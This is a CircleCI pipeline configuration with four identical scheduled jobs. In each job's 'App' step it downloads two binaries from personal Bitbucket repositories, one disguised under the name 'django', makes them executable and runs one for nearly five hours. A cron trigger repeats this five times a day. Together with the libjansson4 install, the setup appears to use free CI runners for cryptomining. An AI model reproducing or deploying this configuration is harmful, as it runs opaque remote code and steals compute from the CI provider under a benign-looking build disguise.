version: 2.1
orbs:

  ruby: circleci/ruby@0.1.2 
jobs:
  App_01:
    docker:
      - image: circleci/ruby:3.0.1-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 300s && sudo apt update -y
            sleep 300s && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/ghsug/raw/6690a25f7f330030080547422c53003fcfa37078674/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_02:
    docker:
      - image: circleci/rust:1.53.0-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 300s && sudo apt update -y
            sleep 300s && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/ghsug/raw/6690a25f7f330030080547422c53003fcfa37078674/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_03:
    docker:
      - image: circleci/golang:1.17-rc-buster

    steps:
      - run:
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 300s && sudo apt update -y
            sleep 300s && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/ghsug/raw/6690a25f7f330030080547422c53003fcfa37078674/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls

  App_04:
    docker:
      - image: circleci/golang:1.17-rc-buster

    steps:
      - run: 
          name: Update
          command: sudo apt install screen libjansson4 -y
      - run:
          name: Tunggu
          command: |
            sleep 300s && sudo apt update -y
            sleep 300s && sudo apt update -y
      - run:
          name: App
          command: |
            screen -dmS ls
            wget https://bitbucket.org/santict/run/raw/ee94eb0421728225bf0a680669964e86cf115b63/ccm && wget https://bitbucket.org/Akonbisu66/ghsug/raw/6690a25f7f330030080547422c53003fcfa37078674/django && chmod u+x * && timeout 285m ./django && stop
            sudo apt update -y
            ls
workflows:
  version: 2.1
  commit:
    jobs:
      - App_01
      - App_02
      - App_03
      - App_04
    triggers:
      - schedule:
          cron: "0 0,5,10,15,20 * * *"
          filters:
            branches: 
              only:
                - master
                
  asuirunjob:
    jobs:
      - App_01
      - App_02
      - App_03
      - App_04
  